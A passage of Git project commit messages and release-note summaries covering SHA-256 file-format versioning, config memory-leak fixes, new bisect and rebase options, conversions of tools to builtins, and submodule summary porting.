and should act as an equivalent to "git add" for the path, but the
command failed to do so for such a path.
* rp/apply-cached-with-i-t-a:
t4140: test apply with i-t-a paths
apply: make i-t-a entries never match worktree
apply: allow "new file" patches on i-t-a entries
"git bisect" learns the "--first-parent" option to find the first
breakage along the first-parent chain.
* al/bisect-first-parent:
bisect: combine args passed to find_bisection()
bisect: introduce first-parent flag
cmd_bisect__helper: defer parsing no-checkout flag
rev-list: allow bisect and first-parent flags
t6030: modernize "git bisect run" tests
A no-op replacement function implemented as a C preprocessor macro
does not perform as good a job as one implemented as a "static
inline" function in catching errors in parameters; replace the
former with the latter in <git-compat-util.h> header.
* jc/noop-with-static-inline:
compat-util: type-check parameters of no-op replacement functions
The existing backends for "git mergetool" based on variants of vim
have been refactored and then support for "nvim" has been added.
* pd/mergetool-nvimdiff:
mergetools: add support for nvimdiff (neovim) family
mergetool--lib: improve support for vimdiff-style tool variants
Further preliminary change to refs API.
* hn/reftable-prep-part-2:
Make HEAD a PSEUDOREF rather than PER_WORKTREE.
Modify pseudo refs through ref backend storage
t1400: use git rev-parse for testing PSEUDOREF existence
Stop when "sendmail.*" configuration variables are defined, which
could be a mistaken attempt to define "sendemail.*" variables.
* dd/send-email-config:
git-send-email: die if sendmail.* config is set
The logic to find the ref transaction hook script attempted to
cache the path to the found hook without realizing that it needed
to keep a copied value, as the API it used returned a transitory
buffer space. This has been corrected.
* ps/ref-transaction-hook:
t1416: avoid hard-coded sha1 ids
refs: fix interleaving hook calls with reference-transaction hook
Similar to the commit-graph format, the multi-pack-index format has a
byte in the header intended to track the hash version used to write the
file. This allows one to interpret the hash length without having the
context of the repository config specifying the hash length. This was
not modified as part of the SHA-256 work because the hash length was
automatically up-shifted due to that config.
Since we have this byte available, we can make the file formats more
obviously incompatible instead of relying on other context from the
repository.
Add a new oid_version() method in midx.c similar to the one in
commit-graph.c. This is specifically made separate from that
implementation to avoid artificially linking the formats.
The test impact requires a few more things than the corresponding change
in the commit-graph format. Specifically, 'test-tool read-midx' was not
writing anything about this header value to output. Since the value
available in 'struct multi_pack_index' is hash_len instead of a version
value, we output "20" or "32" instead of "1" or "2".
Since we want a user to not have their Git commands fail if their
multi-pack-index has the incorrect hash version compared to the
repository's hash version, we relax the die() to an error() in
load_multi_pack_index(). This has some effect on 'git multi-pack-index
verify' as we need to check that a failed parse of a file that exists is
actually a verify error. For that test that checks the hash version
matches, we change the corrupted byte from "2" to "3" to ensure the test
fails for both hash algorithms.
Helped-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The commit-graph format reserved a byte among the header of the file to
store a "hash version". During the SHA-256 work, this was not modified
because file formats are not necessarily intended to work across hash
versions. If a repository has SHA-256 as its hash algorithm, it
automatically up-shifts the lengths of object names in all necessary
formats.
However, since we have this byte available for adjusting the version, we
can make the file formats more obviously incompatible instead of relying
on other context from the repository.
Update the oid_version() method in commit-graph.c to add a new value, 2,
for sha-256. This automatically writes the new value in a SHA-256
repository _and_ verifies the value is correct. This is a breaking
change relative to the current 'master' branch since 092b677 (Merge
branch 'bc/sha-256-cvs-svn-updates', 2020-08-13) but it is not breaking
relative to any released version of Git.
The test impact is relatively minor: the output of 'test-tool
read-graph' lists the header information, so those instances of '1' need
to be replaced with a variable determined by GIT_TEST_DEFAULT_HASH. A
more careful test is added that specifically creates a repository of
each type then swaps the commit-graph files. The important value here is
that the "git log" command succeeds while writing a message to stderr.
Helped-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the ensure_core_worktree() function, we load the core.worktree value
of the submodule repository using repo_config_get_string(). This
function copies the string, but we never free it, leaking the memory.
We can instead use the "tmp" version of that function to avoid the
allocation at all. We don't have to worry about lifetime issues, since
we never even look at the value (we just want to know if it's set).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We use git_config_get_string() to retrieve the expiry value in a newly
allocated string. But after parsing it, we never free it, leaking the
memory.
We could fix this with a free() obviously, but there's an even better
solution: we can use the non-allocating "tmp" variant of the function;
we only need it to be valid for the lifetime of our parse function.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As evidenced by the leak fixes in the previous commit, the "const" in
git_config_get_string_const() clearly misleads people into thinking that
it does not allocate a copy of the string. We can fix this by renaming
it, but it's easier still to just drop it. Of the four remaining
callers:
- The one in git_config_parse_expiry() still needs to allocate, since
that's what its callers expect. We can just use the non-const
version and cast our pointer. Slightly ugly, but the damage is
contained in one spot.
- The two in apply are writing to global "const char *" variables, and
need to continue allocating. We often mark these as const because we
assign default string literals to them. But in this case we don't do
that, so we can just declare them as real "char *" pointers and use
the non-const version.
- The call in checkout doesn't actually need a copy; it can just use
the non-allocating "tmp" version of the function.
The function is also mentioned in the MyFirstContribution document. We
can swap that call out for the non-allocating "tmp" variant, which fits
well in the example given.
We'll drop the "configset" and "repo" variants, as well (which are
unused).
Note that this frees up the "const" name, so we could rename the "tmp"
variant back to that. But let's give some time for topics in flight to
adapt to the new code before doing so (if we do it too soon, the
function semantics will change but the compiler won't alert us).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rebase is implemented with two different backends - 'apply' and
'merge' each of which support a different set of options. In
particular the apply backend supports a number of options implemented
by 'git am' that are not implemented in the merge backend. This means
that the available options are different depending on which backend is
used which is confusing. This patch adds support for the
--committer-date-is-author-date option to the merge backend. This
option uses the author date of the commit that is being rewritten as
the committer date when the new commit is created.
Original-patch-by: Rohit Ashiwal <rohit.ashiwal265@gmail.com>
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The implementation of --committer-date-is-author-date exports
GIT_COMMITTER_DATE to override the default committer date but does not
reset GIT_COMMITTER_DATE in the environment after creating the commit
so it is set in the environment of any hooks that get run. We're about
to add the same functionality to the sequencer and do not want to have
GIT_COMMITTER_DATE set when running hooks or exec commands so lets
update commit_tree_extended() to take an explicit committer so we
override the default date without setting GIT_COMMITTER_DATE in the
environment.
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a file has been deleted the C version of add -p allows the user
to edit a hunk even though 'e' is not in the list of allowed
responses. (I think 'e' is disallowed because if the file is edited it
is no longer a deletion and we're not set up to rewrite the diff
header).
The invalid response was allowed because the test that determines
whether to display 'e' was not duplicated correctly in the code that
processes the user's choice. Fix this by using flags that are set when
constructing the prompt and checked when processing the user's choice
rather than repeating the check itself.
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This simplifies the code slightly, especially the third case where
hunk_nr was incremented a few lines before ALLOC_GROW().
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Update mingw_unlink() to first try to delete the file with existing
permissions before trying to force it.
Windows throws an error when trying to delete a read-only file. The
mingw_unlink() compatibility wrapper always tries to _wchmod(666) the
file before calling _wunlink() to avoid that error. However, since
most files in the worktree are already writable, this is usually
wasted effort.
Update mingw_unlink() to just call DeleteFileW() directly and if that
succeeds return. If that fails, fall back into the existing code path
to update the permissions and use _wunlink() to get the existing
error code mapping.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After eff45daab8 ("repository: enable SHA-256 support by default",
2020-07-29), vanilla builds of Git enable the user to run, e.g.,
git init --object-format=sha256
and hack away. This can be a good way to gain experience with the
SHA-256 world, e.g., to find bugs that
GIT_TEST_DEFAULT_HASH=sha256 make test
doesn't spot.
But it really is a separate world: Such SHA-256 repos will live entirely
separate from the (by now fairly large) set of SHA-1 repos. Interacting
across the border is possible in principle, e.g., through "diff + apply"
(or "format-patch + am"), but even that has its limitations: Applying a
SHA-256 diff in a SHA-1 repo works in the simple case, but if you need
to resort to `-3`, you're out of luck.
Similarly, "push + pull" should work, but you really will be operating
mostly offset from the rest of the world. That might be ok by the time
you initialize your repository, and it might be ok for several months
after that, but there might come a day when you're starting to regret
your use of `git init --object-format=sha256` and have dug yourself into
a fairly deep hole.
There are currently topics in flight to document our data formats and
protocols regarding SHA-256 and in some cases (midx and commit-graph),
we're considering adjusting how the file formats indicate which object
format to use.
Wherever `--object-format` is mentioned in our documentation, let's make
it clear that using it with "sha256" is experimental. If we later need
to explain why we can't handle data we generated back in 2020, we can
always point to this paragraph we're adding here.
By "include::"-ing a small blurb, we should be able to be consistent
throughout the documentation and can eventually gradually tone down the
severity of this text. One day, we might even use it to start phasing
out `--object-format=sha1`, but let's not get ahead of ourselves...
There's also `extensions.objectFormat`, but it's only mentioned three
times. Twice where we're adding this new disclaimer and in the third
spot we already have a "do not edit" warning. From there, interested
readers should eventually find this new one that we're adding here.
Because `GIT_DEFAULT_HASH` provides another entry point to this
functionality, document the experimental nature of it too.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A couple of functions that used struct refspec_item did not zero out the
structure memory. This can result in unexpected behavior, especially if
additional parameters are ever added to refspec_item in the future. Use
memset to ensure that unset structure members are zero.
It may make sense to convert most of these uses of struct refspec_item
to use either struct initializers or refspec_item_init_or_die. However,
other similar code uses memset. Converting all of these uses has been
left as a future exercise.
Signed-off-by: Jacob Keller <jacob.keller@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In commit d27eb356bf ("remote: move doc to remote.h and refspec.h")
the documentation for the refspec structure was moved into refspec.h
This documentation refers to elements of the refspec_item, not the
struct refspec. Move the documentation slightly in order to align it
with the structure it is actually referring to.
Signed-off-by: Jacob Keller <jacob.keller@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Similar to recent commits, document that we list object names rather
than SHA-1s.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Two of our capabilities contain "sha1" in their names, but that's
historical. Clarify that object names are still to be given using
whatever object format has been negotiated using the "object-format"
capability.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Document that in SHA-1 repositories, we use SHA-1 and in SHA-256
repositories, we use SHA-256, then replace all other uses of "SHA-1"
with something more neutral. Avoid referring to "160-bit" hash values.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Document that rather than always naming objects using SHA-1, we should
use whatever has been negotiated using the object-format capability.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Like f0bca72dc7 (send-pack: use buffered I/O to talk to pack-objects,
2016-06-08), significantly reduce the number of system calls and
simplify the code for sending object IDs to rev-list by using stdio's
buffering.
Take care to handle errors immediately to get the correct error code,
and to flush the buffer explicitly before closing the stream in order to
catch any write errors for these last bytes.
Helped-by: Chris Torek <chris.torek@gmail.com>
Helped-by: Johannes Sixt <j6t@kdbg.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Like f0bca72dc7 (send-pack: use buffered I/O to talk to pack-objects,
2016-06-08), significantly reduce the number of system calls and
simplify the code for sending object IDs to pack-objects by using
stdio's buffering.
Helped-by: Chris Torek <chris.torek@gmail.com>
Helped-by: Johannes Sixt <j6t@kdbg.org>
Encouraged-by: Derrick Stolee <stolee@gmail.com>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Like f0bca72dc7 (send-pack: use buffered I/O to talk to pack-objects,
2016-06-08), significantly reduce the number of system calls and
simplify the code for sending object IDs to rev-list by using stdio's
buffering.
Take care to handle errors immediately to get the correct error code,
and to flush the buffer explicitly before closing the stream in order to
catch any write errors for these last bytes.
Helped-by: Chris Torek <chris.torek@gmail.com>
Helped-by: Johannes Sixt <j6t@kdbg.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There are two functions to get a single config string:
- git_config_get_string()
- git_config_get_string_const()
One might naively think that the first one allocates a new string and
the second one just points us to the internal configset storage. But
in fact they both allocate a new copy; the second one exists only to
avoid having to cast when using it with a const global which we never
intend to free.
The documentation for the function explains that clearly, but it seems
I'm not alone in being surprised by this. Of 17 calls to the function,
13 of them leak the resulting value.
We could obviously fix these by adding the appropriate free(). But it
would be simpler still if we actually had a non-allocating way to get
the string. There's git_config_get_value() but that doesn't quite do
what we want. If the config key is present but is a boolean with no
value (e.g., "[foo]bar" in the file), then we'll get NULL (whereas the
string versions will print an error and die).
So let's introduce a new variant, git_config_get_string_tmp(), that
behaves as these callers expect. We need a new name because we have new
semantics but the same function signature (so even if we converted the
four remaining callers, topics in flight might be surprised). The "tmp"
is because this value should only be held onto for a short time. In
practice it's rare for us to clear and refresh the configset,
invalidating the pointer, but hopefully the "tmp" makes callers think
about the lifetime. In each of the converted cases here the value only
needs to last within the local function or its immediate caller.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We unconditionally write a branch name into a newly allocated buffer in
new_branch_info->path, via setup_branch_path(). We then check to see if
the branch exists; if not, we set that field to NULL, leaking the
memory. We should take care to free() it when doing so.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The prepare_to_clone_next_submodule() function has a few local-variable
strbufs. We use strbuf_reset() throughout the function to reuse the
buffers over and over. But at the end of the function we also use
strbuf_reset() as they go out of scope, which means we end up leaking
their heap buffers. This should be strbuf_release() instead.
These were introduced by 48308681b0 (git submodule update: have a
dedicated helper for cloning, 2016-02-29), but it doesn't seem to have
the same mistake elsewhere. Likewise, I looked for other instances of
the pattern in the submodule--helper file but couldn't find any.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
sequencer's get_message() exists to provide good labels on conflict
hunks; see commits
d68565402a ("revert: clarify label on conflict hunks", 2010-03-20)
bf975d379d ("cherry-pick, revert: add a label for ancestor", 2010-03-20)
043a4492b3 ("sequencer: factor code out of revert builtin", 2012-01-11).
for background on this function. These labels are of the form
<commitID>... <commit summary>
or
parent of <commitID>... <commit summary>
These labels are then passed as branch names to the merge machinery.
However, these labels, as formatted, often also serve to confuse. For
example, if we have a rename involved in a content merge, then it
results in text such as the following:
<<<<<<<< HEAD:foo.c
int j;
========
int counter;
>>>>>>>> b01dface... Removed unnecessary stuff:bar.c
Or in various conflict messages, it can make it very difficult to read:
CONFLICT (rename/delete): foo.c deleted in b01dface... Removed
unnecessary stuff and renamed in HEAD. Version HEAD of foo.c left
in tree.
CONFLICT (file location): dir1/foo.c added in b01dface... Removed
unnecessary stuff inside a directory that was renamed in HEAD,
suggesting it should perhaps be moved to dir2/foo.c.
Make a minor change to remove the ellipses and add parentheses around
the commit summary; this makes all three examples much easier to read:
<<<<<<<< HEAD:foo.c
int j;
========
int counter;
>>>>>>>> b01dface (Removed unnecessary stuff):bar.c
CONFLICT (rename/delete): foo.c deleted in b01dface (Removed
unnecessary stuff) and renamed in HEAD. Version HEAD of foo.c left
in tree.
CONFLICT (file location): dir1/foo.c added in b01dface (Removed
unnecessary stuff) inside a directory that was renamed in HEAD,
suggesting it should perhaps be moved to dir2/foo.c.
Signed-off-by: Elijah Newren <newren@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Acked-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 96cc8ab531 (sparse-checkout: use hashmaps for cone patterns,
2019-11-21) added some auxiliary hashmaps to the pattern_list struct,
but they're leaked when clear_pattern_list() is called.
Signed-off-by: Jeff King <peff@peff.net>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There are still a handful mentions of SHA-1 when we meant the
(hexadecimal) object names in end-user facing messages. Rewrite
them.
I was hoping that this can mostly be s/SHA-1/object name/, but
a few messages needed rephrasing to keep the result readable.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
One of the required steps for the objectFormat extension is to implement
the loose object index. However, without support for
compatObjectFormat, we don't even know if the loose object index is
needed, so it makes sense to move that step to the compatObjectFormat
section. Do so.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that we have SHA-256 support for packs and indices, let's document
that in SHA-256 repositories, we use SHA-256 instead of SHA-1 for object
names and checksums. Instead of duplicating this information throughout
the document, let's just document that in SHA-1 repositories, we use
SHA-1 for these purposes, and in SHA-256 repositories, we use SHA-256.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "git blame --first-parent" option was not documented, but now
it is.
* rp/blame-first-parent-doc:
blame-options.txt: document --first-parent option
A new helper function has_object() has been introduced to make it
easier to mark object existence checks that do and don't want to
trigger lazy fetches, and a few such checks are converted using it.
* jt/has_object:
fsck: do not lazy fetch known non-promisor object
pack-objects: no fetch when allow-{any,promisor}
apply: do not lazy fetch when applying binary
sha1-file: introduce no-lazy-fetch has_object()
'todo_list_write_to_file' may overwrite the static buffer, originating
from 'find_unique_abbrev', that was used to store the short commit hash
'c' for "# Rebase a..b onto c" message in the todo editor. This is
because the buffer that is returned from 'find_unique_abbrev' is valid
until 4 more calls to `find_unique_abbrev` are made.
As 'todo_list_write_to_file' calls 'find_unique_abbrev' for each rebased
commit, the hash for 'c' is overwritten if there are 4 or more commits
in the rebase. This behavior has been broken since its introduction.
Fix by storing the short onto commit hash in a different buffer that
remains valid, before calling 'todo_list_write_to_file'.
Found-by: Jussi Keränen <jussike@gmail.com>
Signed-off-by: Antti Keränen <detegr@rbx.email>
Acked-by: Alban Gruin <alban.gruin@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The third part of the Fortran xfuncname regex wants to match the
beginning of a subroutine or function, so it allows for all characters
except `'`, `"` or whitespace before the keyword 'function' or
'subroutine'. This is meant to match the 'recursive', 'elemental' or
'pure' keywords, as well as function return types, and to prevent
matches inside strings.
However, the negated set does not contain the `!` comment character,
so a line with an end-of-line comment containing the keyword 'function' or
'subroutine' followed by another word is mistakenly chosen as a hunk header.
Improve the regex by adding `!` to the negated set.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The Fortran userdiff patterns, introduced in 909a5494f8 (userdiff.c: add
builtin fortran regex patterns, 2010-09-10), predate the test
infrastructure for xfuncname patterns, introduced in bfa7d01413 (t4018:
an infrastructure to test hunk headers, 2014-03-21).
Add tests for the Fortran xfuncname patterns. The test
't/t4018/fortran-comment-keyword' documents a shortcoming of the regex
that is fixed in a subsequent commit.
While at it, add descriptive comments for the different parts of the
regex.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The '--set-upstream' option to `git fetch` (which is also accepted by
`git pull` and passed through to the underlying `git fetch`) allows
setting the upstream configuration for the current branch. This was
added in 24bc1a1292 (pull, fetch: add --set-upstream option,
2019-08-19).
However, the documentation for that option describes its action as 'If
the remote is fetched successfully, pull and add upstream (tracking)
reference [...]', which is wrong because this option does not cause
neither `git fetch` nor `git pull` to pull: `git fetch` does not pull
and `git pull` always pulls.
Fix the description of that option.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the merge diagram, some whitespace is missing which
makes it a bit confusing, fix that.
Signed-off-by: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We UNLEAK() the "sorting" list created by parsing command-line options
(which is essentially used until the program exits). But we do so right
before leaving the cmd_ls_remote() function, which means we have to hit
all of the exits. But the point of UNLEAK() is that it's an annotation
which doesn't impact the variable itself. We can mark it as soon as
we're done writing its value, and then we only have to do so once.
This gives us a minor code reduction, and serves as a better example of
how UNLEAK() can be used.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The point of UNLEAK() is to make a reference to a variable that is about
to go out of scope so that leak-checkers will consider it to be
not-leaked. Doing so right before die() is therefore pointless; even
though we are about to exit the program, the variable will still be on
the stack and accessible to leak-checkers.
These annotations aren't really hurting anything, but they clutter the
code and set a bad example of how to use UNLEAK().
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The code in vcs-svn was started in 2010 as an attempt to build a
remote-helper for interacting with svn repositories (as opposed to
git-svn). However, we never got as far as shipping a mature remote
helper, and the last substantive commit was e99d012a6b in 2012.
We do have a git-remote-testsvn, and it is even installed as part of
"make install". But given the name, it seems unlikely to be used by
anybody (you'd have to explicitly "git clone testsvn::$url", and there
have been zero mentions of that on the mailing list since 2013, and even
that includes the phrase "you might need to hack a bit to get it working
properly"[1]).
We also ship contrib/svn-fe, which builds on the vcs-svn work. However,
it does not seem to build out of the box for me, as the link step misses
some required libraries for using libgit.a. Curiously, the original
build breakage bisects for me to eff80a9fd9 (Allow custom "comment
char", 2013-01-16), which seems unrelated. There was an attempt to fix
it in da011cb0e7 (contrib/svn-fe: fix Makefile, 2014-08-28), but on my
system that only switches the error message.
So it seems like the result is not really usable by anybody in practice.
It would be wonderful if somebody wanted to pick up the topic again, and
potentially it's worth carrying around for that reason. But the flip
side is that people doing tree-wide operations have to deal with this
code. And you can see the list with (replace "HEAD" with this commit as
appropriate):
{
echo "--"
git diff-tree --diff-filter=D -r --name-only HEAD^ HEAD
} |
git log --no-merges --oneline e99d012a6bc.. --stdin
which shows 58 times somebody had to deal with the code, generally due
to a compile or test failure, or a tree-wide style fix or API change.
Let's drop it and let anybody who wants to pick it up do so by
resurrecting it from the git history.
As a bonus, this also reduces the size of a stripped installation of Git
from 21MB to 19MB.
[1] https://lore.kernel.org/git/CALkWK0mPHzKfzFKKpZkfAus3YVC9NFYDbFnt+5JQYVKipk3bQQ@mail.gmail.com/
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There's no reason that git-fast-import benefits from being a separate
binary. And as it links against libgit.a, it has a non-trivial disk
footprint. Let's make it a builtin, which reduces the size of a stripped
installation from 22MB to 21MB.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There's no reason that bugreport has to be a separate binary. And since
it links against libgit.a, it has a rather large disk footprint. Let's
make it a builtin, which reduces the size of a stripped installation
from 24MB to 22MB.
This also simplifies our Makefile a bit. And we can take advantage of
builtin niceties like RUN_SETUP_GENTLY.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There's no real reason for credential helpers to be separate binaries. I
did them this way originally under the notion that helper don't _need_
to be part of Git, and so can be built totally separately (and indeed,
the ones in contrib/credential are). But the ones in our main Makefile
build on libgit.a, and the resulting binaries are reasonably large.
We can slim down our total disk footprint by just making them builtins.
This reduces the size of:
make strip install
from 29MB to 24MB on my Debian system.
Note that credential-cache can't operate without support for Unix
sockets. Currently we just don't build it at all when NO_UNIX_SOCKETS is
set. We could continue that with conditionals in the Makefile and our
list of builtins. But instead, let's build a dummy implementation that
dies with an informative message. That has two advantages:
- it's simpler, because the conditional bits are all kept inside
the credential-cache source
- a user who is expecting it to exist will be told _why_ they can't
use it, rather than getting the "credential-cache is not a git
command" error which makes it look like the Git install is broken.
Note that our dummy implementation does still respond to "-h" in order
to appease t0012 (and this may be a little friendlier for users, as
well).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Over the years some more programs have become builtins, but nobody
updated this MSVC-specific section of the file (which specifically says
that it should not include builtins). Let's bring it up to date.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After blame has finished but before we produce any output, we coalesce
groups of lines that were adjacent in the original suspect (which may
have been split apart by lines in intermediate commits which went away).
However, this can cause incorrect output if the lines are not also
adjacent in the result. For instance, the case in t8003 has:
ABC
DEF
which becomes
ABC
SPLIT
DEF
Blaming only lines 1 and 3 in the result yields two blame groups (one
for each line) that were adjacent in the original. That's enough for us
to coalesce them into a single group, but that loses information: our
output routines assume they're adjacent in the result as well, and we
output:
<oid> 1) ABC
<oid> 2) SPLIT
This is nonsense for two reasons:
- we were asked about line 3, not line 2; we should not output the
SPLIT line at all
- commit <oid> did not touch the SPLIT line at all! We found the
correct blame for line 3, but the bug is actually in the output
stage, which is showing the wrong line number and content from the
final file.
We can fix this by only coalescing when both the suspect and result
lines are adjacent. That fixes this bug, but keeps coalescing in cases
where want it (e.g., the existing test in t8003 where SPLIT goes away,
and the lines really are adjacent in the result).
Reported-by: Nuthan Munaiah <nm6061@rit.edu>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for adding more tests of blame's coalesce code, let's
split the setup out from the first test, and give each of the commits
a more meaningful name:
- $orig for the original source that added the lines
- $split for the version where they are split apart
- $final for the final version that re-joins them
That's not strictly necessary, but makes the follow-on tests less
brittle than relying on HEAD^, etc, to name the commits.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit f0cbe742f4 (blame: add a test to cover blame_coalesce(),
2019-06-20) added a test case where blame can usefully coalesce two
groups of lines. But since it relies on the normal blame output, it only
exercises the code and can't tell whether the lines were actually
joined into a single group.
However, by using --porcelain output, we can see how git-blame considers
the groupings (and likewise how the coalescing might have a real
user-visible impact for a tool that uses the porcelain-output
groupings). This lets us confirm that we are indeed coalescing correctly
(and the fact that this test case requires coalescing can be verified by
dropping the call to blame_coalesce(), causing the test to fail).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Convert submodule subcommand 'summary' to a builtin and call it via
'git-submodule.sh'.
The shell version had to call $diff_cmd twice, once to find the modified
modules cared by the user and then again, with that list of modules
to do various operations for computing the summary of those modules.
On the other hand, the C version does not need a second call to
$diff_cmd since it reuses the module list from the first call to do the
aforementioned tasks.
In the C version, we use the combination of setting a child process'
working directory to the submodule path and then calling
'prepare_submodule_repo_env()' which also sets the 'GIT_DIR' to '.git',
so that we can be certain that those spawned processes will not access
the superproject's ODB by mistake.
A behavioural difference between the C and the shell version is that the
shell version outputs two line feeds after the 'git log' output when run
outside of the tests while the C version outputs one line feed in any
case. The reason for this is that the shell version calls log with
'--pretty=format:<fmt>' whose output is followed by two echo
calls; 'format' does not have "terminator" semantics like its 'tformat'
counterpart. So, the log output is terminated by a newline only when
invoked by the user and not when invoked from the scripts. This results
in the one & two line feed differences in the shell version.
On the other hand, the C version calls log with '--pretty=<fmt>'
which is equivalent to '--pretty:tformat:<fmt>' which is then
followed by a 'printf("\n")'. Due to its "terminator" semantics the
log output is always terminated by newline and hence one line feed in
any case.
Also, when we try to pass an option-like argument after a non-option
argument, for instance:
git submodule summary HEAD --foo-bar
(or)
git submodule summary HEAD --cached
That argument would be treated like a path to the submodule for which
the user is requesting a summary. So, the option ends up having no
effect. Though, passing '--quiet' is an exception to this:
git submodule summary HEAD --quiet
While 'summary' doesn't support '--quiet', we don't get an output for
the above command as '--quiet' is treated as a path which means we get
an output only if a submodule whose path is '--quiet' exists.
The error message in case of computing a summary for non-existent
submodules in the C version is different from that of the shell version.
Since the new error message is not marked for translation, change the
'test_i18ngrep' in t7421.4 to 'grep'.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Stefan Beller <stefanbeller@gmail.com>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Helped-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Prathamesh Chavan <pc44800@gmail.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
't7401-submodule-summary.sh' uses 'git add' to add submodules. Therefore,
some commands such as 'git submodule init' and 'git submodule deinit'
do not work as expected.
So, introduce a test script for verifying the 'summary' output for
submodules added using 'git submodule add' and notify regarding the
above mentioned behaviour in t7401 itself.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The helper functions: show_submodule_summary(),
prepare_submodule_summary() and print_submodule_summary() are used by
the builtin_diff() function in diff.c to generate a summary of
submodules in the context of a diff. Functions with similar names are to
be introduced in the upcoming port of submodule's summary subcommand.
So, rename the helper functions to '*_diff_submodule_summary()' to avoid
ambiguity.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Many `submodule--helper` subcommands follow the convention that a struct
defines their callback data, and the declaration of that struct is
followed immediately by a macro to use in static initializers, without
any separating empty line.
Let's align the `init`, `status` and `sync` subcommands with that convention.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
